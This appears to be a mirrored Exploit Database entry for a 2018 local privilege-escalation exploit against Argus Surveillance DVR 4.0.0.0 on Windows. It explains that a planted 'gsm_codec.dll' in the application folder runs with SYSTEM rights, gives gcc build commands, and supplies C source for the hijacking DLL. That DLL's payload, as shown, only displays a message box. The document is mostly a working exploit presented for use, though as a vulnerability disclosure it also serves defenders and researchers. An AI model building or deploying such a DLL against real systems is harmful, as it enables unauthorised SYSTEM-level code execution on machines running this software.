Argus Surveillance DVR 4.0.0.0 – Privilege Escalation

• Exploit Database
• 113 阅读

• 作者： hyp3rlinx
  日期： 2018-08-31
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45312/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  /* # Exploit Title: Argus Surveillance DVR 4.0.0.0 - Privilege Escalation # Author: John Page (aka hyp3rlinx) # Date: 2018-08-29 # Vendor: Argus Surveillance DVR - 4.0.0.0 # Software Link: http://www.argussurveillance.com/download/DVR_stp.exe # CVE: N/A # Tested on: Windows 7 x86   # Description: # Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation. # Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will # lead to arbitrary code execution with SYSTEM integrity # Affected Component: DVRWatchdog.exe   # Exploit/POC # Create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, # launch Argus DVR tada! your now SYSTEM. */   #include <windows.h>   /* hyp3rlinx */   /* gcc -c -m32 gsm_codec.c gcc -shared -m32 -o gsm_codec.dll gsm_codec.o */   void systemo(){ MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION ); }   BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ systemo(); break; } case DLL_PROCESS_DETACH:{ systemo(); break; } case DLL_THREAD_ATTACH:{ systemo(); break; } case DLL_THREAD_DETACH:{ systemo(); break; } } return TRUE; }   # https://vimeo.com/287115698 # Greetz: ***Greetz: indoushka | Eduardo | GGA***